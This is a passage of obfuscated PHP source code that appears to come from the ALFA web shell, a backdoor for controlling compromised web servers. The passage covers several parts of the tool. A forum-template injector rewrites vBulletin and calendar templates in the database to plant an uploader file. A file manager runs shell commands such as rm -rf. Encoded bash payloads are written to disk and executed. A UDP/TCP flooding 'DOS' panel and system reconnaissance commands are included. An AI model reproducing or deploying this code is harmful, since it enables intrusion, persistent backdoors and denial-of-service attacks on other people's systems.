"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $repairdbtemp = "update {$prefix}templates SET template= '{$repsave}' where title = 'calendar'"; $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . "/calendar.php"); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/solevisible.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . "/calendar.php"; $fff = "http://" . $realurl . $realpath . "/solevisible.php"; echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>"; } } } } if (isset($_POST["alfa3"]) && $_POST["alfa3"] == "vb") { AlfaNum(1, 2, 7, 9, 10); echo __pre() . "<p><div class="txtfont_header">| vbulletin |</div></p><p>" . getConfigHtml("vb") . "</p><form name="frm" method="POST" onsubmit="g('ShellInjectors',null,null,this.lo.value,'vb',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Host : ", "inputName" => "lo", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "DataBase Name : ", "inputName" => "db", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "User Name : ", "inputName" => "user", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Password : ", "inputName" => "pass", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix : ", "inputName" => "tab", "id" => "db_prefix", "inputValue" => '', "inputSize" => "50")); create_table($table); echo $selector; echo "<p><input type="submit" value=" " /></p></form></center>"; if (isset($_POST["alfa4"]) && !empty($_POST["alfa4"])) { $method = $_POST["alfa8"]; $faq_name = "faq"; $faq_file = "/faq.php"; $code = "{${" . ALFA_UPLOADER . "}}{${exit()}}&"; $conn = @mysqli_connect($_POST["alfa2"], $_POST["alfa4"], $_POST["alfa5"], $_POST["alfa7"]) or die(@mysqli_connect_error()); $rec = "select `template` from " . $_POST["alfa6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; if (empty($savetoass)) { $faq_name = "header"; $faq_file = "/"; $rec = "select `template` from " . $_POST["alfa6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; $code = ALFA_UPLOADER . ";"; } $code = str_replace("'", "\'", $code); $p = "UPDATE " . $_POST["alfa6"] . "template SET `template`='" . $code . "' WHERE `title`='" . $faq_name . "'"; $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn)); $geturl = @mysqli_query($conn, "select `value` from " . $_POST["alfa6"] . "setting WHERE `varname`='bburl'"); $getval = @mysqli_fetch_assoc($geturl); $saveval = $getval["value"]; if ($faq_name == "header") { if (substr($saveval, -5, 5) == "/core") { $saveval = substr($saveval, 0, -5); } } $realurl = parse_url($saveval, PHP_URL_HOST); $realpath = parse_url($saveval, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET {$realpath}.{$faq_file} HTTP/1.1
"); @fputs($fsock, "HOST: {$realurl}
"); @fputs($fsock, "Connection: close\xd

\xa"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $p1 = "UPDATE " . $_POST["alfa6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . $faq_file); $p1 = "UPDATE " . $_POST["alfa6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/solevisible.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . $faq_file; $fff = "http://" . $realurl . $realpath . "/solevisible.php"; echo "<center><p><font color="#FFFFFF">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color="#FFFFFF">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>"; } } } echo "</div>"; alfafooter(); } goto CQ4Ti; KS5YC: if (!isset($GLOBALS["DB_NAME"]["user"])) { die("$GLOBALS['DB_NAME']['user']"); } goto wAV1i; e8nkk: $xd .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd\xa"; goto hho1B; tWrGE: function alfaFilesMan() { if (!empty($_COOKIE["alfa_f"])) { $_COOKIE["alfa_f"] = @unserialize($_COOKIE["alfa_f"]); } if (!empty($_POST["alfa1"])) { switch ($_POST["alfa1"]) { case "uploadFile": $move_cmd_file = false; $alfa_canruncmd = false; if ($GLOBALS["glob_chdir_false"]) { $alfa_canruncmd = _alfa_can_runCommand(true, true); $move_cmd_file = true; } if (_alfa_is_writable($GLOBALS["cwd"])) { $files = reArrayFiles($_FILES["f"]); $ret_files = array(); foreach ($files as $file) { if ($move_cmd_file && $alfa_canruncmd) { alfaEx("cat '" . addslashes($file["tmp_name"]) . "' > '" . addslashes($_POST["c"] . "/" . $file["name"]) . "'"); } else { if (@move_uploaded_file($file["tmp_name"], $file["name"])) { $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($file["name"])) : array("name" => "????"); $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($file["name"])) : array("name" => "????"); $file_owner = $ow["name"] ? $ow["name"] : (function_exists("fileowner") ? @fileowner($file["name"]) : "????"); $file_group = $gr["name"] ? $gr["name"] : (function_exists("filegroup") ? @filegroup($file["name"]) : "????"); $file_modify = @date("Y-m-d H:i:s", @filemtime($file["name"])); $file_perm = alfaPermsColor($file["name"]); $file_size = @filesize($file["name"]); $ret_files[] = array("name" => $file["name"], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner . "/" . $file_group); } } } if (!$move_cmd_file) { echo json_encode($ret_files); } } else { echo "noperm"; return; } if (!$move_cmd_file) { return; } break; case "mkdir": $new_dir_cmd = false; if ($GLOBALS["glob_chdir_false"]) { if (_alfa_can_runCommand(true, true)) { if (_alfa_is_writable($GLOBALS["cwd"])) { if (!_alfa_is_dir(trim($_POST["alfa2"]))) { alfaEx("cd '" . trim(addslashes($_POST["c"])) . "';mkdir '" . trim(addslashes($_POST["alfa2"])) . "'"); echo "<script>alfaShowNotification('" . addslashes($_POST["alfa2"]) . " created...', 'Files manager');</script>"; } else { echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>"; } } else { echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>"; } } else { echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>"; } } else { if (_alfa_is_writable($GLOBALS["cwd"])) { if (!_alfa_is_dir(trim($_POST["alfa2"]))) { if (!@mkdir(trim($_POST["alfa2"]))) { echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>"; } else { echo "<script>alfaShowNotification('" . addslashes($_POST["alfa2"]) . " created...', 'Files manager');</script>"; } } else { echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>"; } } else { echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>"; } } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = @opendir($path); while (($item = @readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = @filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } @closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = rawurldecode($f); if ($GLOBALS["glob_chdir_false"]) { if (_alfa_can_runCommand(true, true)) { alfaEx("rm -rf '" . addslashes($_POST["c"] . "/" . $f) . "'"); } } else { alfaEx("rm -rf '" . addslashes($f) . "'", false, false); if (@is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } } if (@is_dir(rawurldecode(@$_POST["alfa2"])) && rawurldecode(@$_POST["alfa2"]) != "..") { deleteDir(rawurldecode(@$_POST["alfa2"])); alfaEx("rm -rf '" . addslashes($_POST["alfa2"]) . "'", false, false); } else { @unlink(rawurldecode(@$_POST["alfa2"])); } if ($GLOBALS["glob_chdir_false"]) { $source = rawurldecode(@$_POST["alfa2"]); if ($source != ".." && !empty($source)) { if (_alfa_can_runCommand(true, true)) { alfaEx("cd '" . trim(addslashes($_POST["c"])) . "';rm -rf '" . addslashes($source) . "'"); } } } if (is_array($_POST["f"])) { return; } break; case "paste": if ($_COOKIE["alfa_act"] == "copy" && isset($_COOKIE["alfa_f"])) { foreach ($_COOKIE["alfa_f"] as $f) { copy_paste($_COOKIE["alfa_c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["alfa_act"] == "move" && isset($_COOKIE["alfa_f"])) { function move_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["alfa_f"] as $f) { @rename($_COOKIE["alfa_c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["alfa_act"] == "zip" && isset($_COOKIE["alfa_f"])) { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); $zipX = "alfa_" . rand(1, 1000) . ".zip"; if ($zip->open($zipX, 1)) { @chdir($_COOKIE["alfa_c"]); foreach ($_COOKIE["alfa_f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["alfa_c"] . $f)) { $zip->addFile($_COOKIE["alfa_c"] . $f, $f); } elseif (@is_dir($_COOKIE["alfa_c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $key = str_replace("\", "/", realpath($key)); if (@is_dir($key)) { if (in_array(substr($key, strrpos($key, "/") + 1), array(".", ".."))) { continue; } } else { $zip->addFile($key, $key); } } } } @chdir($GLOBALS["cwd"]); $zip->close(); __alert(">> " . $zipX . " << is created..."); } } } elseif ($_COOKIE["alfa_act"] == "unzip" && isset($_COOKIE["alfa_f"])) { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["alfa_f"] as $f) { if ($zip->open($_COOKIE["alfa_c"] . $f)) { $zip->extractTo($_COOKIE["alfa_cwd"]); $zip->close(); } } } } unset($_COOKIE["alfa_f"]); break; default: if (!empty($_POST["alfa1"])) { if (in_array($_POST["alfa1"], array("copy", "move", "zip", "unzip"))) { __alfa_set_cookie("alfa_act", @$_POST["alfa1"]); __alfa_set_cookie("alfa_f", @serialize($_POST["f"])); __alfa_set_cookie("alfa_c", @$_POST["c"]); return; } } break; } } $dirContent = @scandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if (preg_match("#(.*)\/\.\.#", $_POST["c"], $res)) { $path = explode("/", $res[1]); array_pop($path); $_POST["c"] = implode("/", $path); } $cmd_dir = false; if ($dirContent === false) { if (_alfa_can_runCommand(true, true)) { $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"]; @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); if (!isset($_COOKIE["alfachdir_bash"]) || @(!file_exists($tmp_getdir_path . "/alfacgiapi/getdir.alfa"))) { $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg=="; $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa", $bash); __alfa_set_cookie("alfachdir_bash", "true"); __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path); } $dirContent = alfaEx("cd " . $tmp_getdir_path . "/alfacgiapi;sh getdir.alfa '" . addslashes(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]) . "'"); $dirContent = json_decode($dirContent, true); if (is_array($dirContent)) { array_pop($dirContent); $cmd_dir = true; } else { $dirContent = false; } } } alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4); $count_dirContent = @count($dirContent); if ($count_dirContent > 300) { @($_COOKIE["alfa_limited_files"] = 100); } $alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : "name"; $alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int) $_COOKIE["alfa_limited_files"] : 0; $alfa_files_page_number = isset($_POST["pagenum"]) ? (int) $_POST["pagenum"] : 1; $alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : "asc"; $files_page_count = 1; if ($alfa_limited_files > 0) { $files_page_count = ceil($count_dirContent / $alfa_limited_files); if ($files_page_count > 1) { $files_page_count++; } } echo "<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,'alfa_sort_by');" style="color:#25ff00;"><option value="name" " . ($alfa_sort_by == "name" ? "selected" : '') . ">Name</option><option value="size" " . ($alfa_sort_by == "size" ? "selected" : '') . ">Size</option><option value="modify" " . ($alfa_sort_by == "modify" ? "selected" : '') . ">Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,'alfa_filesman_direction')" style="color:#25ff00;"><option value="asc" " . ($alfa_filesman_direction == "asc" ? "selected" : '') . ">Ascending</option><option value="desc" " . ($alfa_filesman_direction == "desc" ? "selected" : '') . ">Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="" . $alfa_limited_files . "" oninput="this.value=this.value.replace(/[^0-9]/g,'');setCookie('alfa_limited_files', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">" . ($count_dirContent - 1) . "</b></span></div><div class="header">"; if ($dirContent == false) { echo "<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>"; alfaFooter(); return; } global $sort; $sort = array("name", 1); if (isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])) { $sort[0] = $_COOKIE["alfa_sort_by"]; } if (!empty($_POST["alfa1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["alfa1"], $match)) { $sort = array($match[1], (int) $match[2]); } } if ($alfa_files_page_number > $files_page_count - 1) { $alfa_files_page_number = 1; } $checkbox_rand = rand(11111, 99999); echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk" . $checkbox_rand . "' onclick='checkBox(this);' class='chkbx'><label for='mchk" . $checkbox_rand . "'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>"; $dirs = $files = array(); $n = $count_dirContent; if ($n > $alfa_limited_files && $alfa_limited_files > 0) { $n = $alfa_limited_files * $alfa_files_page_number; if ($n > $count_dirContent) { $n = $count_dirContent; } } $i = 0; if ($alfa_limited_files > 0 && $alfa_files_page_number > 1) { $i = $alfa_limited_files * ($alfa_files_page_number - 1); } $page_builder = get_pagination_links($alfa_files_page_number, $files_page_count - 1); $cmd_dir_backp = ''; for (; $i < $n; $i++) { if ($cmd_dir) { $filename = $dirContent[$i]["name"]; $file_owner = $dirContent[$i]["owner"]; $file_group = $dirContent[$i]["group"]; $file_modify = @date("Y-m-d H:i:s", $dirContent[$i]["modify"]); $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"], "num" => $dirContent[$i]["permnum"], "human" => $dirContent[$i]["permhuman"]), true); $file_size = $dirContent[$i]["size"]; if (substr($dirContent[$i]["name"], 0, 1) == "/") { $file_path = $dirContent[$i]["name"]; $dirContent[$i]["name"] = ".."; $filename = $dirContent[$i]["name"]; } else { $file_path = $GLOBALS["cwd"] . "/" . $dirContent[$i]["name"]; } } else { $filename = $dirContent[$i]; $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS["cwd"] . $filename)) : array("name" => "????"); $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS["cwd"] . $filename)) : array("name" => "????"); $file_owner = $ow["name"] ? $ow["name"] : (function_exists("fileowner") ? @fileowner($GLOBALS["cwd"] . $filename) : "????"); $file_group = $gr["name"] ? $gr["name"] : (function_exists("filegroup") ? @filegroup($GLOBALS["cwd"] . $filename) : "????"); $file_modify = @date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $filename)); $file_perm = alfaPermsColor($GLOBALS["cwd"] . $filename); $file_size = @filesize($GLOBALS["cwd"] . $filename); $file_path = $GLOBALS["cwd"] . $filename; } $tmp = array("name" => $filename, "path" => $file_path, "modify" => $file_modify, "perms" => $file_perm, "size" => $file_size, "owner" => $file_owner, "group" => $file_group); if ($filename == ".." && !$cmd_dir) { $tmp["path"] = str_replace("\", "/", realpath($file_path)); } if (!$cmd_dir) { if (@is_file($file_path)) { $arr_mrg = array("type" => "file"); if (@is_link($file_path)) { $arr_mrg["link"] = readlink($tmp["path"]); } $files[] = array_merge($tmp, $arr_mrg); } elseif (@is_link($file_path)) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($file_path) && $filename != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } else { if ($dirContent[$i]["type"] == "file") { $files[] = array_merge($tmp, array("type" => "file")); } else { if ($dirContent[$i]["name"] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } } } $GLOBALS["sort"] = $sort; function alfaCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "alfaCmp"); usort($dirs, "alfaCmp"); if (isset($_COOKIE["alfa_filesman_direction"]) && !empty($_COOKIE["alfa_filesman_direction"])) { if ($_COOKIE["alfa_filesman_direction"] == "desc") { $files = array_reverse($files); $dirs = array_reverse($dirs); } } $files = array_merge($dirs, $files); $l = 0; $cc = 0; foreach ($files as $f) { $f["name"] = htmlspecialchars($f["name"]); $newname = mb_strlen($f["name"], "UTF-8") > 60 ? mb_substr($f["name"], 0, 60, "utf-8") . "..." : $f["name"]; $checkbox = "checkbox_" . $checkbox_rand . $cc; $raw_name = rawurlencode($f["name"]); $icon = $GLOBALS["DB_NAME"]["show_icons"] ? "<img src="" . findicon($f["name"], $f["type"]) . "" width="30" height="30">" : ''; $style = $GLOBALS["DB_NAME"]["show_icons"] ? "position:relative;display:inline-block;bottom:12px;" : ''; echo "<tr class="fmanager-row" id="tr_row_" . $cc . ""><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="" . $raw_name . "" class="chkbx" id="" . $checkbox . ""><label for="" . $checkbox . ""></label></div></td><td id="td_row_" . $cc . "">" . $icon . "<div style="" . $style . ""><a row="" . $cc . "" id="id_" . $cc . "" class="main_name" onclick="" . ($f["type"] == "file" ? "editor('" . $raw_name . "','auto','','','','" . $f["type"] . "');" href="#action=fileman&path=" . $GLOBALS["cwd"] . "&file=" . $raw_name . "" fname="" . $raw_name . "" ftype="file" path="" . $GLOBALS["cwd"] . "" opt_title="" . $f["link"] . "" " . (isset($f["link"]) ? "onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"" : '') . ">" . ($GLOBALS["cwd"] . $f["name"] == $GLOBALS["__file_path"] ? "<span class='shell_name' style='font-weight:unset;'>" . $f["name"] . "</span>" : htmlspecialchars($newname)) : "g('FilesMan','" . $f["path"] . "');" href="#action=fileman&path=" . $f["path"] . "" fname="" . $raw_name . "" ftype="folder" path="" . $GLOBALS["cwd"] . "" opt_title="" . $f["link"] . "" " . (isset($f["link"]) ? "onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"" : '') . "><b>| " . htmlspecialchars($f["name"]) . " |</b>") . "</a></td></div><td><span style="font-weight:unset;" class="main_size">" . ($f["type"] == "file" ? (isset($f["link"]) ? "[L] " : '') . alfaSize($f["size"]) : $f["type"]) . "</span></td><td><span style="font-weight:unset;" class="main_modify">" . $f["modify"] . "</span></td><td><span style="font-weight:unset;" class="main_owner_group">" . $f["owner"] . "/" . $f["group"] . "</span></td><td><a id="id_chmode_" . $cc . "" href=javascript:void(0) onclick="editor('" . $raw_name . "','chmod','','','','" . $f["type"] . "')">" . $f["perms"] . "</td><td><a id="id_rename_" . $cc . "" title="Rename" class="actions" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'rename','','','','" . $f["type"] . "')">R</a> <a id="id_touch_" . $cc . "" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'touch','','','','" . $f["type"] . "')">T</a>" . ($f["type"] == "file" ? " <a id="id_edit_" . $cc . "" class="actions" title="Edit" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'edit','','','','" . $f["type"] . "')">E</a> <a id="id_download_" . $cc . "" title="Download" class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $raw_name . "', 'download')">D</a>" : '') . "<a id="id_delete_" . $cc . "" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # " . addslashes(rawurldecode($f["name"])) . " # ?'); chk ? g('FilesMan',null,'delete', '" . $raw_name . "') : '';"> X </a></td></tr>"; $l = $l ? 0 : 1; $cc++; } echo "<tr id='filemanager_last_tr'><td colspan=7>
<input type=hidden name=a value='FilesMan'>\xa<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["glob_chdir_false"] ? $_POST["c"] : $GLOBALS["cwd"]) . "'>\xa<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>\xa<input type='submit' value=' '>\xa</form></table><div class='pages-holder'><div class='pages-number'>" . $page_builder . "</div></div></div></div>"; alfafooter(); } goto TdVrb; tvxAH: function alfados() { alfahead(); echo "<div class=header>"; echo "<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g('dos',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>"; if (!empty($_POST["alfa1"]) && !empty($_POST["alfa2"]) && !empty($_POST["alfa3"])) { echo __pre(); $packets = 0; ignore_user_abort(true); $exec_time = (int) $_POST["alfa2"]; $time = time(); $max_time = $exec_time + $time; $host = $_POST["alfa1"]; $port = (int) $_POST["alfa3"]; $method = $_POST["alfa4"]; $out = str_repeat("X", 65000); while (1) { $packets++; if (time() > $max_time) { break; } $fp = @fsockopen($method . "://" . $host, $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); } } echo "<center>{$packets} (" . @round($packets * 65 / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>"; echo "</pre>"; } echo "</div>"; alfafooter(); } goto XTnlF; H2ZQs: function alfaproc() { alfahead(); echo "<Div class=header><br><center>"; if (empty($_POST["ajax"]) && !empty($_POST["alfa1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } if ($GLOBALS["sys"] == "win") { $process = array("Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab"); } foreach ($process as $n => $link) { echo "<a href="javascript:void(0);" onclick="g('proc',null,'" . $link . "')"> | " . $n . " | </a>"; } echo "</center><br>"; if (!empty($_POST["alfa1"])) { echo "<pre class='ml1' style='margin-top:5px' >"; if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) { $cmd = "cd '" . addslashes($_POST["c"]) . "';"; } echo alfaEx($cmd . $_POST["alfa1"], true); echo "</pre>"; } echo "</div>"; alfafooter(); } goto ar_2Q; AkVgx: function _alfa_file_exists($file, $cgi = true) { if (@file_exists($file)) { return true; } else { if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) { return true; } } return false; } goto q3RIR; nWc3X: function alfaupdateheader() { if (!isset($_COOKIE["updateheader_data"])) { $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw=="; $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"])); $tmp_path = alfaWriteTocgiapi("getheader.alfa", $bash); $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa", false, true, true); if (@is_array(@json_decode($data, true))) { __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data)); echo $data; } } else { echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]); } } goto xSGgd; NKFok: function alfaCreateParentFolder() { $parent = $GLOBALS["home_cwd"] . "/" . __ALFA_DATA_FOLDER__; if (!@is_dir($parent)) { 